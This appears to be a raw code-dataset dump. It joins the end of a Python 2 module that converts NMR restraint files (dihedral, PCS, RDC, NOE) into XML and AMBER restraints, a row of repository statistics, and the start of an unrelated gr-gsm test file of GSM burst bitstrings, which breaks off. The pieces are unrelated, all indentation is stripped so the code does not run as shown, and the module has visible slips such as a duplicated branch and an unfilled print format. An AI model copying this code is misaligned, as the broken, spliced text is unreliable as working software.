#chi1_rn = ["ALA","ILE","VAL","CYS","SER"]
if ang == "CHI1":
if resna[0:3] == "ILE" or resna[0:3] == "VAL":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "CG1"
elif resna[0:3] == "SER":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "OG"
elif resna[0:3] == "THR":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "OG1"
elif resna[0:3] == "CYS":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "SG"
else:
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "CG"
resnu1 = resnu
resnu2 = resnu
ang_ok = True
if ang == "CHI2":
if resna[0:3] == "ARG" or resna[0:3] == "GLN" or resna[0:3] == "GLU" or resna[0:3] == "LYS":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "CD"
elif resna[0:3] == "ASN" or resna[0:3] == "ASP":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "OD1"
elif resna[0:3] == "CYS":
atm1 = "CA"
atm2 = "CB"
atm3 = "SG"
atm4 = "HG"
elif resna[0:2] == "HI":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "ND1"
elif resna[0:3] == "LEU" or resna[0:3] == "PHE" or resna[0:3] == "TRP" or resna[0:3] == "TYR":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "CD1"
elif resna[0:3] == "MET":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "SD"
resnu1 = resnu
resnu2 = resnu
ang_ok = True
if ang_ok:
ran1 = math.radians(float(ang1))
ran2 = math.radians(float(ang2))
rand = (ran2 - ran1)/2
ranf = ran1 + rand
attri_ang = {}
attri_ang["angle"] = ang
attri_ang["res"] = resna[0:3]
type = etree.SubElement(sel, "cyana", attrib = attri_ang)
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm2
sel3 = etree.SubElement(sel, "sel3")
etree.SubElement(sel3, "resid").text = resnu
etree.SubElement(sel3, "name").text = atm3
sel4 = etree.SubElement(sel, "sel4")
etree.SubElement(sel4, "resid").text = resnu2
etree.SubElement(sel4, "name").text = atm4
dist = etree.SubElement(sel, "angle")
etree.SubElement(dist, "C").text = "1"
etree.SubElement(dist, "ang").text = "%6.2f" % math.degrees(ranf)
etree.SubElement(dist, "d_ang").text = "%6.2f" % math.degrees(rand)
etree.SubElement(dist, "exp").text = "2"
else:
attri_ang = {}
attri_ang["angle"] = ang
attri_ang["ERROR"] = "Angle not found"
etree.SubElement(sel, "cyana", attrib = attri_ang)
#print etree.tostring(root, pretty_print=True)
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
#
#xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), "xml_noe")
#xml_file_w = open(xml_file, 'w')
#xml_file_w.write()
#xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(root, pretty_print=True)
nocorr = 0
[ resu_vx, rst ]= cnvdx.convert(root, ini_num, pdb_out, pdb_ref_n, nocorr)
print rst
dih_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih + "_dih_RST")
print dih_out_rst
dih_out_rst_file = open(dih_out_rst, 'w')
dih_out_rst_file.writelines(rst)
dih_out_rst_file.close()
return resu_vx
def check_pcs_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "pcs":
f_pcs = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_pcs
pcs_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs )
#if os.path.exists(pcs_in):
# os.remove(pcs_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group( num.setResultsName("val_pcs") + num.setResultsName("tol") ).setResultsName("values")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + word + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp + sexp + sexp + sexp + sexp.setResultsName("sel1") + numf
file = open(pcs_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
#remove xml entry of nasted braket
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_pcs = etree.fromstring(remove_item(sexpr.asXML("pcs")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("pcs")))
xml_file_w.close()
#print pdb_out
#print pdb_ref_n
print etree.tostring(xml_pcs, pretty_print=True)
return remove_item(sexpr.asXML("pcs"))
def check_pcs_d_cyana(xmlin, cyana):
print "XML PCS INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "pcs":
f_pcs = elt.get('filename')
ini_num = elt.get('number')
print "file pcs input"
print f_pcs
print cyana
pcs_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs)
xxx = open(pcs_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("pcs")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if not cyana:
if len(sf) >= 4 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_pcs = sf[3]
tol = sf[4]
wheight = sf[5]
tens = sf[6]
if atm1 == "H":
atm2 = "N"
elif atm1 == "HN":
atm2 = "N"
elif atm1 == "HA":
atm2 = "CA"
elif atm1 == "HA":
atm2 = "CA"
else:
atmnf = 1
print "ATOM %s whit not listed attacched atom"
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_pcs").text = val_pcs
etree.SubElement(dist, "tol").text = tol
#Formato copiato da il sorgente di cyana
#C ------------------------------------------------------------------
#C GETDIP: reads a file containing the pseudocontact shift
#C constraints.
#C Format is:
#C
#C I3,1X,2A5,1X,F7.2,1X,I1,A1,f5.2,1x,f5.2,1x,I2
#C
#C that corresponds to:
#C
#C IRESDIP() residue number;
#C NAMRESDIP() residue name;
#C NAMATDIP() atom name;
#C PSHIFTOR() pseudocontact shift (original);
#C QQDIA if letter 'd' the averaged experimental shift is compared
#C to the averaged experimental shift (in this case weight
#C is doubled);
#C NPROT() number of atoms whose calculated shifts must be averaged;
#C TOLPROT() tolerance on calculated shift;
#C WPROT() weight of the individual contraints (multiplies wdip).
#C
#C
#C Mauro A. Cremonini 24/01/95
#C Mauro A. Cremonini 07/02/96
#C
#C
#C NUTE() index counting the different tensors
if cyana:
if len(sf) >= 7 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_pcs = sf[3]
molatm = sf[4]
tol = sf[5]
weight = sf[6]
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm1
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_pcs").text = val_pcs
etree.SubElement(dist, "molatm").text = molatm
etree.SubElement(dist, "tol").text = tol
etree.SubElement(dist, "weight").text = weight
print etree.tostring(root, pretty_print=True)
xml_pcs = etree.tostring(root, pretty_print=True)
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(xml_pcs)
xml_file_w.close()
return xml_pcs
def check_rdc_d_cyana(xmlin, cyana):
print "XML DIH INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "rdc":
f_rdc = elt.get('filename')
ini_num = elt.get('number')
print "file rdc input"
print f_rdc
print cyana
rdc_in = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_rdc)
xxx = open(rdc_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("rdc")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if not cyana:
if len(sf) >= 4 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_rdc = sf[3]
tol = sf[4]
wheight = sf[5]
if len(sf) >= 7 :
tens = sf[6]
else:
tens = ""
if atm1 == "H":
atm2 = "N"
elif atm1 == "HN":
atm2 = "N"
elif atm1 == "HA":
atm2 = "CA"
elif atm1 == "HA":
atm2 = "CA"
else:
atmnf = 1
print "ATOM %s whit not listed attacched atom"
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm2
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm1
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_rdc").text = val_rdc
etree.SubElement(dist, "tol").text = tol
if cyana:
if len(sf) >= 8 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu1 = sf[0]
atm1 = sf[1]
resnu2 = sf[2]
atm2 = sf[3]
val_rdc = sf[4]
tol = sf[5]
weight = sf[6]
point = sf[7]
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_rdc").text = val_rdc
etree.SubElement(dist, "tol").text = tol
etree.SubElement(dist, "weight").text = weight
etree.SubElement(dist, "point").text = point
print etree.tostring(root, pretty_print=True)
xml_rdc = etree.tostring(root, pretty_print=True)
xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_rdc+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(xml_rdc)
xml_file_w.close()
return xml_rdc
def check_rdc_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "rdc":
f_rdc = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_rdc
rdc_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_rdc )
#if os.path.exists(rdc_in):
# os.remove(rdc_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group( num.setResultsName("val_rdc") + num.setResultsName("tol") ).setResultsName("values")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + word + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp + sexp + sexp + sexp + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + numf
file = open(rdc_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
#remove xml entry of nasted braket
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_rdc = etree.fromstring(remove_item(sexpr.asXML("rdc")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_rdc+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("rdc")))
xml_file_w.close()
#print pdb_out
#print pdb_ref_n
print etree.tostring(xml_rdc, pretty_print=True)
return remove_item(sexpr.asXML("rdc"))
def check_dih_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "dihedral":
f_dih = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_dih
dih_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih )
#if os.path.exists(dih_in):
# os.remove(dih_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group(num.setResultsName("c") + num.setResultsName("ang") + num.setResultsName("d_ang") + num.setResultsName("exp")).setResultsName("angle")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + Regex(r" *[a-z A-Z 0-9]") + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + sexp.setResultsName("sel3") + sexp.setResultsName("sel4") + numf
file = open(dih_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
#remove xml entry of nasted braket
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_dih = etree.fromstring(remove_item(sexpr.asXML("dih")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "xml_dih")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("dih")))
xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(xml_dih, pretty_print=True)
[resu_vx, out_rst]= cnvdx.convert(xml_dih, ini_num, pdb_out, pdb_ref_n,nocorr)
dih_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih + "_dih_RST")
print dih_out_rst
dih_out_rst_file = open(dih_out_rst, 'w')
dih_out_rst_file.writelines(out_rst)
dih_out_rst_file.close()
return resu_vx
def check_noe_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "noe":
f_noe = elt.get('filename')
ini_num = elt.get('number')
nocorr = elt.get('nocorr')
#nocorr = 0
print f_noe
noe_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe)
#if os.path.exists(noe_in):
# os.remove(noe_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+".")
numf = Group(num.setResultsName("D") + num.setResultsName("D_minus") + num.setResultsName("D_plus"))
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + Regex(r" *[a-z A-Z 0-9]") + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
optor = sor + sexp.setResultsName("selQ1") + sexp.setResultsName("selQ2")
pr = assi + Optional(trash) + sexp.setResultsName("sel1") + sexp.setResultsName("sel2") + numf + ZeroOrMore(optor)
file = open(noe_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
#remove xml entry of nasted braket
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_noe = etree.fromstring(remove_item(sexpr.asXML("noe")))
sele = xml_noe.findall("selection")
#covert or in QQG QQD atom
for i in sele:
selq1 = i.find("selQ1")
selq2 = i.find("selQ2")
sel1 = i.find("sel1")
sel2 = i.find("sel2")
if selq1 is not None:
te = selq1.find("name").text
if (te == "HG1#" or te == "HG2#") and (sel1.find("name").text[0:2] == te[0:2] and sel1.find("name").text.find("#") > 0):
#print selq1.find("name").text, sel1.find("name").text
sel1.remove(sel1.find("name"))
nsl1 = etree.SubElement(sel1, "name" )
nsl1.text = "QQG"
if (te == "HD1#" or te == "HD2#") and (sel1.find("name").text[0:2] == te[0:2] and sel1.find("name").text.find("#") > 0):
#print selq1.find("name").text, sel1.find("name").text
sel1.remove(sel1.find("name"))
nsl1 = etree.SubElement(sel1, "name" )
nsl1.text = "QQD"
if selq2 is not None:
te = selq2.find("name").text
if (te == "HG1#" or te == "HG2#") and (sel2.find("name").text[0:2] == te[0:2] and sel2.find("name").text.find("#") > 0):
#print selq2.find("name").text, sel2.find("name").text
sel2.remove(sel2.find("name"))
nsl2 = etree.SubElement(sel2, "name" )
nsl2.text = "QQG"
if (te == "HD1#" or te == "HD2#") and (sel2.find("name").text[0:2] == te[0:2] and sel2.find("name").text.find("#") > 0):
#print selq2.find("name").text, sel2.find("name").text
sel2.remove(sel2.find("name"))
nsl2 = etree.SubElement(sel2, "name" )
nsl2.text = "QQD"
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "xml_noe")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(etree.tostring(xml_noe))
xml_file_w.close()
print pdb_out
print pdb_ref_n
#Xplor manage lol in tbl by defualt is disabled
etree.SubElement(xml_noe, "lol").text = "False"
print etree.tostring(xml_noe, pretty_print=True)
nocorr = 0
[resu_vx, outx] = cnvx.convert(xml_noe, ini_num, pdb_out, pdb_ref_n, nocorr)
noe_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe + "_noe_RST")
print noe_out_rst
noe_out_rst_file = open(noe_out_rst, 'w')
noe_out_rst_file.writelines(outx)
noe_out_rst_file.close()
return resu_vx
| 40.258799 | 159 | 0.459578 | 4,360 | 38,890 | 3.979817 | 0.084174 | 0.077801 | 0.018442 | 0.029507 | 0.822441 | 0.807284 | 0.787344 | 0.758529 | 0.738071 | 0.725911 | 0 | 0.023884 | 0.397094 | 38,890 | 965 | 160 | 40.300518 | 0.716168 | 0.090666 | 0 | 0.719298 | 0 | 0.02924 | 0.090249 | 0.004427 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010234 | null | null | 0.087719 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
99eecc4289c1211187267439b6a64d7e127801a1 | 150 | py | Python | tests/test_utils/test_is_func.py | natanfeitosa/pyfunctools | b5354e0d737542b03049eb3e347d6ca1ccceb164 | [
"MIT"
] | 4 | 2021-11-17T15:26:11.000Z | 2022-03-12T01:30:55.000Z | tests/test_utils/test_is_func.py | natanfeitosa/pyfunctools | b5354e0d737542b03049eb3e347d6ca1ccceb164 | [
"MIT"
] | null | null | null | tests/test_utils/test_is_func.py | natanfeitosa/pyfunctools | b5354e0d737542b03049eb3e347d6ca1ccceb164 | [
"MIT"
] | null | null | null | from pyfunctools.utils import is_func
def test_is_func():
def func():
pass
assert is_func(func)
assert is_func(lambda a: a)
| 16.666667 | 37 | 0.646667 | 23 | 150 | 4 | 0.521739 | 0.26087 | 0.195652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.273333 | 150 | 8 | 38 | 18.75 | 0.844037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0.166667 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
82136bff65167c81adeb57ee22431bbcbd879f61 | 23,866 | py | Python | gr-gsm/python/qa_burst_sdcch_subslot_filter.py | ossiemarks/hackrf-gsm | fc3d690354e3bed8b7f8b2f70c3eaf0ecb74d88c | [
"MIT"
] | 6 | 2019-09-05T05:49:31.000Z | 2022-03-29T15:44:44.000Z | gr-gsm/python/qa_burst_sdcch_subslot_filter.py | mapennell/hackrf-gsm | fc3d690354e3bed8b7f8b2f70c3eaf0ecb74d88c | [
"MIT"
] | null | null | null | gr-gsm/python/qa_burst_sdcch_subslot_filter.py | mapennell/hackrf-gsm | fc3d690354e3bed8b7f8b2f70c3eaf0ecb74d88c | [
"MIT"
] | 5 | 2019-09-05T05:49:35.000Z | 2021-07-10T20:42:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @file
# @author Roman Khassraf <rkhassraf@gmail.com>
# @section LICENSE
#
# Gr-gsm is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# Gr-gsm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gr-gsm; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
#
from gnuradio import gr, gr_unittest, blocks
import grgsm
class qa_burst_sdcch_subslot_filter (gr_unittest.TestCase):
# 102 random bursts as test input
bursts_input = [
'0000111100101011111011010010011001000100001001110110000110110001011011101111000100101111111000110000001111111111000111100100011111010100010011111000',
'0001111110000000110110101010001000101000001101111100101100110010001111011010001000111100001010011101000111010111000100000111001111110011000011011000',
'0001101110111011011011011010000001011011001011000100100110010101001111101100010100111110110011001100100011111010110111011001000111101011100001111000',
'0000001011100110100011110111010101111000011111001011010011110000110101110010000011010110010011111001000110001111111010111011011001101010001100110000',
'0001011001110011011101111111100110110111011101001110111110000101001111101100010100111110001111100000000110001000010000010111111011110101100000111000',
'0001110110011011010011100010101010000100011000001111110101111101001111101100010100111110100001001101000100000001011001010110011111100010001111001000',
'0001101100101101011110011001110110011100001100100100100110000010001111011010001000111101101101001100100001110001011001000001100000011111101000011000',
'0000101100001011101001010001111001000000010100000111100110101000110101110010000011010110110000110010100011001111101101101001110111101001000011111000',
'0000011011010111011111101100010100110110000001100011100001010001011011101111000100101110001110000011001100100101111000001010000101010000110101110000',
'0000111100110111001011010100010010110100101010000000010001110010011101011000001001110100001010011111111111001010111010111010001111111101111110101000',
'0000111101101110011111010100010100110001101110001001111100100101001111101100010100111111100010010001001100000000111010001000100011010000110111110000',
'0000011100010011111011011001110010011000001111111110101000100000110101110010000011010111101011000100101011000011011011110000010001100110011010001000',
'0000011011100100011101000010111010101101001111110000110001111010000111011101001000011101111110101010000011100100111101000111101110011011001001100000',
'0000110100110111001010100011100010101001001010011001001111001001001011100001000100101111001001100100001111100111000101110111100011101100110100010000',
'0000011101101000110111010010111001011110101000001011111000101010000111011101001000011100100100010110101110101010001000011001001110100001000101001000',
'0000101000110000011100111010101000001101000111111101100100110010011101011000001001110101001101110101011110010100101010001110100001100010101000001000',
'0000100010110110000111101001011000001010011110000100111101111010011101011000001001110101100010000111010100001000110001110001111101010100100101010000',
'0000010110111011011100011101010001001011001110100011100001000101001111101100010100111110100100110001110011001011110001100000000100100111000011111000',
'0001101110100101110101100101011101111100111010101011110001101010000111011101001000011100100010100111110110111001001000100111110111100100010010111000',
'0000111000101011011101110110001110101111100010100000110111110010000111011101001000011101111011000101010100011111001000010000110101101110000010101000',
'0001001010011001111011001110100001000110010111110011111001000010011101011000001001110100001101000101010010001101001010111100100101010101011100110000',
'0000100010001111101111100100010010100000010111001011101101001000110101110010000011010110110011100111001001100101011010100101110011100001110010001000',
'0000100100010010111100111000011000001100100001110101110011011001011011101111000100101111001011000000010111001011110011000000001101100001001000100000',
'0001010000110010100010110111101111100100000011111000000010111010011101011000001001110101111100000011101010001010100001101000011010110000001001111000',
'0001101101111011000010001000000010001110101111001111111111110001011011101111000100101110110001011010110110100111000000010010101110111001111011000000',
